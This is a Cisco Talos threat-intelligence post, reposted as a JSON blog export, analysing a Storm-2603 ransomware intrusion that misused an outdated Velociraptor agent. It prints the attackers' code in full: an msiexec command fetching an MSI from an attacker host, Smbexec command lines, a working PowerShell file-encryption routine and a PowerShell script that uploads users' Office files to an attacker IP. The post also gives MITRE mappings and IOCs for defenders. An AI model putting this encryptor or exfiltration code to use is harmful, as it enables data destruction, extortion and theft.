{"id":20794,"date":"2025-10-09T07:47:09","date_gmt":"2025-10-09T07:47:09","guid":{"rendered":"http:\/\/localhost\/?p=20794"},"modified":"2025-10-09T07:47:09","modified_gmt":"2025-10-09T07:47:09","slug":"velociraptor-leveraged-in-ransomware-attacks","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=20794","title":{"rendered":"Velociraptor leveraged in ransomware attacks_TALOSBLOG:FC34D3B85009C3A92DAB211EB18F9849"},"content":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2025-10-09T12:09:10&#8243;,&#8221;description&#8221;:&#8221;* Cisco Talos has confirmed that ransomware operators are leveraging _Velociraptor_, an open-source digital forensics and incident response (DFIR) tool that had not previously been definitively tied to _ransomware incidents_.\\n  * We assess with moderate confidence that this activity can be attributed to the threat actor Storm-2603, based on _overlapping tools and tactics, techniques, and procedures (TTPs)_.\\n  * Talos also observed evidence of Babuk ransomware files on the victim&#8217;s network; Babuk has not previously been deployed by Storm-2603.\\n\\n![Velociraptor leveraged in ransomware attacks](https:\/\/blog.talosintelligence.com\/content\/images\/2025\/09\/threat-spotlight.jpg)\\n\\nIn August 2025, Talos responded to a ransomware attack by actors who appeared to be affiliated with Warlock ransomware, based on their ransom note and their use of Warlock&#8217;s data leak site (DLS). They deployed Warlock, LockBit, and Babuk ransomware to encrypt VMware ESXi virtual machines (VMs) and Windows servers, severely impacting the customer&#8217;s IT environment.\\n\\n![Velociraptor leveraged in ransomware attacks](https:\/\/blog.talosintelligence.com\/content\/images\/2025\/10\/data-src-image-c75ca8d0-25e6-41ef-bf2a-3de717f3ed75.png) Figure 1. 
Ransomware note.\\n\\n# Velociraptor\\n\\nVelociraptor is designed for security teams to perform endpoint monitoring: client agents are deployed across Windows, Linux and Mac systems to continuously collect data and respond to security events.\\n\\nVelociraptor played a significant role in this campaign, ensuring the actors maintained stealthy, persistent access while deploying LockBit and Babuk ransomware. After gaining initial access, the actors installed an outdated version of Velociraptor (version 0.73.4.0) that is affected by a privilege escalation vulnerability (_CVE-2025-6264_) which could lead to arbitrary command execution and endpoint takeover.\\n\\nThreat actors have also _reportedly leveraged Velociraptor_ to download and execute Visual Studio Code, likely intending to create a tunnel to an attacker-controlled command-and-control (C2) server.\\n\\nThe addition of this tool to the ransomware playbook is in line with findings from Talos&#8217; _2024 Year in Review_, which highlights that threat actors are utilizing an increasing variety of commercial and open-source products.\\n\\n# Attribution to Storm-2603 and ToolShell nexus\\n\\nTalos assesses with moderate confidence that this activity can be attributed to the group Storm-2603, based on overlapping tools and TTPs. Storm-2603 is a suspected China-based threat actor first identified in July 2025, when they began exploiting the on-premises SharePoint vulnerabilities known as ToolShell.\\n\\nSimilar to the activity Talos observed in this engagement, Storm-2603 is _known for deploying Warlock ransomware and LockBit ransomware_ in the same engagement. 
While LockBit is widely deployed by a variety of ransomware actors, Warlock was first advertised in June 2025 and has since been _heavily used by Storm-2603_. Additionally, it is highly unusual for actors to use two different ransomware variants in the same attack, increasing our confidence that this activity could be related to Storm-2603.\\n\\nThe threat actor in this engagement also mirrored several Storm-2603 TTPs, based on _reporting by Microsoft_:\\n\\n  * Use of cmd.exe and batch scripts\\n  * Disabling Microsoft Defender protections\\n  * Creating scheduled tasks\\n  * Manipulating Internet Information Services (IIS) components to load suspicious .NET assemblies\\n  * Modifying Group Policy Objects (GPOs)\\n\\nWhile Talos was unable to observe how the actor obtained initial access due to limited access to the victim organization&#8217;s data, both the victim&#8217;s exposure to the _ToolShell_ vulnerabilities and our attribution to Storm-2603 increase the likelihood that initial access was gained through ToolShell exploitation.\\n\\n# Campaign overview\\n\\nThe first high-confidence indications of suspicious activity associated with this campaign occurred in mid-August 2025, with attempts to escalate privileges and move laterally within the compromised environment. We observed the threat actor creating admin accounts that synced to Entra ID (formerly Azure Active Directory) via the domain controller. The same actor-controlled admin account also accessed the VMware vSphere console, an interface used to manage and interact with virtual machines (VMs), which could allow for persistent access to the virtual environment.\\n\\nNotably, the threat actor installed an older version of Velociraptor on multiple servers to maintain persistence, using the following command. 
We observed Velociraptor launching several times even after the host was isolated.\\n    \\n    \\n    msiexec\u202f \/q \/i hxxps[:]\/\/stoaccinfoniqaveeambkp.blob.core.windows[.]net\/veeam\/v2.msi\u202f\\n\\nThe actors also executed the following commands to run Smbexec, a Python script that comes with Impacket and allows an attacker to launch programs remotely over the SMB protocol:\\n    \\n    \\n    %COMSPEC% \/Q \/c echo cd ^\\u003e \\\\\\\\%COMPUTERNAME%\\\\C$\\\\__output 2^\\u003e^\\u00261 \\u003e %SYSTEMROOT%\\\\TkTvjYUp.bat \\u0026 %COMSPEC% \/Q \/c %SYSTEMROOT%\\\\TkTvjYUp.bat \\u0026 del %SYSTEMROOT%\\\\TkTvjYUp.bat\u00a0\u00a0\\n    C:\\\\Windows\\\\System32\\\\cmd.exe cmd.exe \/Q \/c cmd \/c c:\\\\windows\\\\temp\\\\1.bat \/y 1\\u003e \\\\Windows\\\\Temp\\\\suLGnR 2\\u003e\\u00261\u00a0\\n\\nTo impair defenses and evade detection, the actors modified Active Directory (AD) GPOs and:\\n\\n  * Enabled \\&#8221;turn off real-time protection,\\&#8221; disabling the component that continuously monitors for potential threats such as viruses, malware and spyware\\n  * Disabled \\&#8221;behavior monitoring,\\&#8221; which blocks suspicious activities by observing deviations from established patterns of normal behavior\\n  * Disabled \\&#8221;monitor file and program activity on your computer,\\&#8221; which observes how software behaves to identify patterns associated with malicious activity\\n\\nThe actors deployed a fileless _PowerShell script_ with encryption functionality, which we believe was the primary encryptor used for mass encryption on the Windows machines: \\n    \\n    \\n    function GER($n) {-join (1..$n|%{\\&#8221;ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!@#$%^\\u0026*()-=+[]{}|;:&#8217;,.\\u003c\\u003e?`~\\&#8221;[(Get-Random -Maximum 74)]})}function err($pl,$sf){$rsa=New-Object System.Security.Cryptography.RSACryptoServiceProvider;$rsa.FromXmlString($sf);$PB=[Text.Encoding]::UTF8.GetBytes($pl);$rsa.Encrypt($PB,$false)} 
function gg($path) {$ke = GER(32);$ig =GER(16);$sf = &#8216;tdIXltqjmTpXRB43p+k6X9+JqBZvsD7+X4GsM0AVh0QS6Oev5RVAaQqc6m2pEKN7AYARcpz9iNy5JOB\/T+OtWmqxd42bLH+iAUjc1kc1qk1Cg38t7obrGja8L7UMoJkb97ry0ngak9BlqaS7P+wzApOLVJoBNxaJ2rCoj7+Crh3p3Vm2\/7\/o4pMjgg4S838jw6aiRbag\/v4SR86oupqjBvKxsAcZo5A4NDFoZ29j\/IMa6GNpMkVjsNPjvB\/GIqGcbTqJkb8HGSXw3KvHqwqfsB+01VTsbO7B8kIkOr4jB\/M+bHFwgYkUG4rS2s\/yJcOOkzH0tJwEj11tLv2bHSzoQQ==AQAB&#8217;; $eec=err -pl $ke+$ig -sf $sf;$eee=[System.Convert]::ToBase64String($eec);$key=[System.Text.Encoding]::UTF8.GetBytes($ke);$iv=[System.Text.Encoding]::UTF8.GetBytes($ig);try{$files=gci $path -Recurse -Include .pdf,.txt, *.doc, *.docx, *.odt, *.rtf, *.md, *.csv, *.tsv, *.jpg, *.jpeg, *.tiff, *.mp3, *.xls, *.xlsx, *.ods, *.ppt, *.pptx, *.odp, *.py, *.java, *.cpp, *.c, *.html, *.css, *.js, *.php, *.swift, *.kotlin, *.go, *.rb, *.sh, *.sql, *.db, *.sqlite, *.sqlite3, *.mdb, *.sql, *.zip, *.rar, *.7z, *.tar, *.gz, *.bz2, *.iso, *.torrent, *.ini, *.json, *.xml, *.log, *.bak, *.cfg, *.psd, *.vmdk | select -Expand FullName; foreach ($file in $files) { try {EFI $file $key $iv $eee} catch{}}} catch {Write-Host $ }} function EFI($ifi,$key,$iv,$aT) {if($ifi.EndsWith(\\&#8221;.xlockxlock\\&#8221;, [System.StringComparison]::OrdinalIgnoreCase)) {return};$aes = [System.Security.Cryptography.Aes]::Create();$aes.KeySize = 256;$aes.Key=$key;$aes.IV=$iv;try{$yy=New-Object System.IO.FileStream($ifi, [System.IO.FileMode]::Open,[System.IO.FileAccess]::ReadWrite, [System.IO.FileShare]::None); $xx=$aes.CreateEncryptor($aes.Key, $aes.IV); $mm = New-Object System.Security.Cryptography.CryptoStream($yy, $xx, [System.Security.Cryptography.CryptoStreamMode]::Write); $yy.Seek(0, [System.IO.SeekOrigin]::Begin) | Out-Null; $jj = New-Object byte[] ($yy.Length); $yy.Read($jj, 0, $jj.Length) | Out-Null; $yy.Seek(0, [System.IO.SeekOrigin]::Begin) | Out-Null; $mm.Write($jj, 0, $jj.Length); $mm.FlushFinalBlock(); $se = 1 } catch { Write-Error $_ } finally {if ($mm) { $mm.Dispose() } if 
($yy) { $yy.Dispose() } }try {$kk = [System.Text.Encoding]::UTF8.GetBytes($aT);$bb = New-Object System.IO.FileStream($ifi,[System.IO.FileMode]::Append,[System.IO.FileAccess]::Write,[System.IO.FileShare]::None);if ($se){$bb.Write($kk, 0, $kk.Length)}} catch {Write-Error $_} finally {if ($bb) { $bb.Dispose();if ($se){ren $ifi -NewName $ifi\\&#8221;.xlockxlock\\&#8221;;}}}};$vg =gdr -PS FileSystem | select -Expand Root;foreach ($II in $vg) {gg -path \\&#8221;$II\\&#8221;}\u00a0\\n\\nAfter the script was deployed, Talos observed ransomware executables on Windows machines that were identified by EDR solutions as LockBit, and encrypted files with the Warlock extension \\&#8221;xlockxlock\\&#8221;. There was also a Linux binary on ESXi servers flagged as the Babuk encryptor, which achieved only partial encryption and appended files with \\&#8221;.babyk\\&#8221;. Storm-2603 has not previously leveraged Babuk ransomware, based on public reporting.\\n\\nThe actors also conducted double extortion, exfiltrating data using the below PowerShell script. To evade detection, the exfiltration script shows that \\&#8221;$ProgressPreference\\&#8221; is set to \\&#8221;SilentlyContinue\\&#8221;, which suppresses any visual indication of the command&#8217;s progress. It also includes the \\&#8221;start-sleep\\&#8221; cmdlet, which suspends the script for a specified period of time. 
This cmdlet can be used to inhibit analysis, as many malware analysis tools, such as sandboxes, have a limited time window, and used to avoid triggering security alerts that might identify rapid, continuous script activity.\\n    \\n    \\n    function GR {$numbers = 1..20;$numbers | Get-Random }\u00a0\u00a0\\n    function Upfile {\u00a0\\n    \u00a0\u00a0\u00a0 param (\u00a0\\n    \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 [string]$path = \\&#8221;C:\\\\Users\\\\\\&#8221;,\u00a0\\n    \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 [int]$maxConcurrentJobs = 40\u00a0 #\u00a0\\n    \u00a0\u00a0\u00a0 )\u00a0\\n    \u00a0\u00a0\u00a0 Add-Type -AssemblyName System.Web\u00a0\\n    \u00a0\u00a0\u00a0 try {\u00a0\\n    \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 $files = Get-ChildItem -Path $path -Recurse -Include *.doc,*.docx,*.xlsx,*.ppt,*.pptx,*.xls -ErrorAction SilentlyContinue |\u00a0\u00a0\\n    \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 Where-Object { $_.Length -lt 50MB } |\u00a0\u00a0\\n    \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 Select-Object -ExpandProperty FullName\u00a0\\n    \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 $uploadScriptBlock = {\u00a0\\n    \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 param ($file, $grValue)\u00a0\\n    \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 try {\u00a0\\n    \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 Add-Type -AssemblyName System.Web\u00a0\\n    \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 $fileName = Split-Path -Path $file -Leaf\u00a0\\n    \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 $encodedFileName = [System.Web.HttpUtility]::UrlEncode($fileName)\u00a0\\n    \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 
$uploadUrl = \\&#8221;http[:]\/\/65.38.121[.]226\/test\/$encodedFileName\\&#8221;\u00a0\\n    \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 Write-Host \\&#8221;upload $file to $uploadUrl\\&#8221;\u00a0\\n    \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 $ProgressPreference = &#8216;SilentlyContinue&#8217;\u00a0\\n                    $maxRetries = 3;$retryCount = 0\u00a0\\n    while ($retryCount -lt $maxRetries) {\u00a0\\n    \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 try {\u00a0\\n    $wc = New-Object System.Net.WebClient;$wc.UploadFile($uploadUrl, \\&#8221;PUT\\&#8221;, $file) | Out-Null\u00a0\\n    \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 Write-Host \\&#8221;upload Sucess $fileName\\&#8221;\u00a0\\n    \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 break\u00a0\\n    }\u00a0\u00a0\\n    catch {\u00a0\\n    \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 $retryCount++\u00a0\\n    \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 Write-Host \\&#8221;upload $fileName retry $retryCount error: $_\\&#8221;\u00a0\\n    \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 Start-Sleep -Seconds 2\u00a0\\n    \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 }\u00a0\u00a0\\n    \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 finally {$wc.Dispose()}}}\u00a0\u00a0\\n    \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 catch\u00a0\u00a0\\n    \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 {\u00a0\\n    \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 Write-Host \\&#8221;upload $fileName error: $_\\&#8221;\u00a0\\n    
\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 }\u00a0\\n    \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 finally {$wc.Dispose()}\u00a0\\n    \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\\n    \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 }\u00a0\\n    \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 $grValue = GR\u00a0\\n    \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 $jobs = @()\u00a0\\n    \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 foreach ($file in $files) {\u00a0\\n    \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 while ((Get-Job -State Running).Count -ge $maxConcurrentJobs) {Start-Sleep -Milliseconds 100}\u00a0\\n    \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 $jobs += Start-Job -ScriptBlock $uploadScriptBlock -ArgumentList $file, $grValue\u00a0\\n    \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 }\u00a0\\n    \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 $jobs | Wait-Job | ForEach-Object {\u00a0\\n    \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 Receive-Job -Job $_ -Keep\u00a0\\n    \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 Remove-Job -Job $_\u00a0\\n    \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 }\u00a0\\n    \u00a0\u00a0\u00a0 } catch {\u00a0\\n    \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 Write-Host \\&#8221;getfile error: $_\\&#8221;\u00a0\\n    \u00a0\u00a0\u00a0 }\u00a0\\n    }\u00a0\\n    $drives = @(\\&#8221;C:\\\\Users\\\\\\&#8221;, \\&#8221;D:\\\\\\&#8221;, \\&#8221;E:\\\\\\&#8221;, \\&#8221;F:\\\\\\&#8221;, \\&#8221;K:\\\\\\&#8221;)\u00a0\\n    foreach ($drive in $drives) {\u00a0\\n    \u00a0\u00a0\u00a0 if (Test-Path $drive) {Upfile -Path $drive\u00a0\u00a0 }\u00a0\\n    \u00a0\u00a0\u00a0 else {Write-Host \\&#8221;Drive $drive is not accessible.\\&#8221; -ForegroundColor Yellow}\u00a0\\n    }\u00a0\\n\\n# Mitigation recommendations\\n\\nPlease see Talos&#8217; _Ransomware Primer_ for detailed recommendations on how to 
safeguard against ransomware threats. We also recommend referring to Talos&#8217; _blog_ on ToolShell for information on these vulnerabilities and how to patch them. Additionally, Rapid7 has published recommendations on detecting Velociraptor misuse.\\n\\n# MITRE ATT\\u0026CK techniques\\n\\nResource Development\\n\\n  * T1584.003 Compromise Infrastructure: Virtual Private Server\\n\\nExecution\\n\\n  * T1059.001 PowerShell\\n\\nPersistence\\n\\n  * T1136 Create Account\\n  * T1505.006 Server Software Component: vSphere Installation Bundles\\n\\nPrivilege Escalation\\n\\n  * T1098.007 Account Manipulation: Additional Local or Domain Groups\\n  * T1098 Account Manipulation\\n\\nDefense Evasion\\n\\n  * T1556 Modify Authentication Process\\n  * T1484.001 Domain or Tenant Policy Modification: Group Policy Modification\\n\\nLateral Movement\\n\\n  * T1021.001 Remote Services: Remote Desktop Protocol\\n\\nCollection\\n\\n  * T1213 Data from Information Repositories\\n\\nExfiltration\\n\\n  * T1041 Exfiltration Over C2 Channel\\n\\nImpact\\n\\n  * T1486 Data Encrypted for Impact\\n  * T1657 Financial Theft\\n\\n# Coverage\\n\\n![Velociraptor leveraged in ransomware attacks](https:\/\/blog.talosintelligence.com\/content\/images\/2025\/10\/coverage-103050700.jpg)\\n\\nCisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free here.\\n\\nCisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. 
You can try Secure Email for free here.\\n\\nCisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat Defense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this threat.\\n\\nCisco Secure Network\/Cloud Analytics (Stealthwatch\/Stealthwatch Cloud) analyzes network traffic automatically and alerts users of potentially unwanted activity on every connected device.\\n\\nCisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products.\\n\\nCisco Secure Access is a modern cloud-delivered Security Service Edge (SSE) built on Zero Trust principles. Secure Access provides seamless, transparent and secure access to the internet, cloud services or private applications, no matter where your users work. Please contact your Cisco account representative or authorized partner if you are interested in a free trial of Cisco Secure Access.\\n\\nUmbrella, Cisco&#8217;s secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs, whether users are on or off the corporate network.\\n\\nCisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them.\\n\\nAdditional protections with context to your specific environment and threat data are available from the Firewall Management Center.\\n\\nCisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network.\\n\\nOpen-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.\\n\\nThe following ClamAV signature covers this threat:   \\nWin.Ransomware.Warlock-10057029-0\\n\\n# IOCs\\n\\nIOCs for this research can also be found at our GitHub repository here.\\n\\n_C2\/exfiltration IP address:_   \\n65.38.121[.]226\\n\\n _Domain hosting 
malicious MSI:_   \\nstoaccinfoniqaveeambkp.blob.core.windows[.]net\\n\\n _Velociraptor C2 server:_   \\nvelo.qaubctgg.workers[.]dev\\n\\n _Velociraptor: legitimate tool used by the adversary for persistence_   \\nVelociraptor installer &#8211; 649BDAA38E60EDE6D140BD54CA5412F1091186A803D3905465219053393F6421   \\nVelociraptor.exe &#8211; 12F177290A299BAE8A363F47775FB99F305BBDD56BBDFDDB39595B43112F9FB7   \\nMalicious Velociraptor config.yaml &#8211; A29125333AD72138D299CC9EF09718DDB417C3485F6B8FE05BA88A08BB0E5023\\n\\n _Internal Monologue NTLM downgrade malware:_   \\nIn.exe &#8211; C74897B1E986E2876873ABB3B5069BF1B103667F7F0E6B4581FBDA3FD647A74A&#8221;,&#8221;published&#8221;:&#8221;2025-10-09T10:00:18&#8243;,&#8221;modified&#8221;:&#8221;2025-10-09T10:00:18&#8243;,&#8221;type&#8221;:&#8221;talosblog&#8221;,&#8221;title&#8221;:&#8221;Velociraptor leveraged in ransomware attacks&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;TALOSBLOG:FC34D3B85009C3A92DAB211EB18F9849&#8243;,&#8221;bulletinFamily&#8221;:&#8221;blog&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[&#8220;CVE-2025-6264&#8243;],&#8221;sourceData&#8221;:&#8221;&#8221;,&#8221;sourceHref&#8221;:&#8221;&#8221;,&#8221;cvss&#8221;:{&#8220;score&#8221;:5.5,&#8221;severity&#8221;:&#8221;MEDIUM&#8221;,&#8221;vector&#8221;:&#8221;CVSS:3.1\/AV:N\/AC:H\/PR:H\/UI:N\/S:C\/C:L\/I:L\/A:L&#8221;,&#8221;version&#8221;:&#8221;3.1&#8243;},&#8221;cvss2&#8243;:{},&#8221;cvss3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#
8221;&#8221;,&#8221;cvssV3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;}},&#8221;href&#8221;:&#8221;https:\/\/blog.talosintelligence.com\/velociraptor-leveraged-in-ransomware-attacks\/&#8221;,&#8221;category_name&#8221;:&#8221;News&#8221;,&#8221;post_link&#8221;:&#8221;&#8221;,&#8221;product&#8221;:&#8221;&#8221;,&#8221;version&#8221;:&#8221;&#8221;,&#8221;vendor&#8221;:&#8221;&#8221;,&#8221;ai_description&#8221;:&#8221;&#8221;,&#8221;ai_severity&#8221;:&#8221;&#8221;,&#8221;ai_vendor&#8221;:&#8221;&#8221;,&#8221;ai_product&#8221;:&#8221;&#8221;,&#8221;ai_version&#8221;:&#8221;&#8221;,&#8221;ai_score&#8221;:0}<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[6,8,70,12,21,13,7,69,11,5],"class_list":["post-20794","post","type-post","status-publish","format-standard","hentry","category-category_news","tag-cve","tag-cvss","tag-cvss-55","tag-exploit","tag-medium","tag-news","tag-security","tag-talosblog","tag-tapic","tag-vulnerability"]}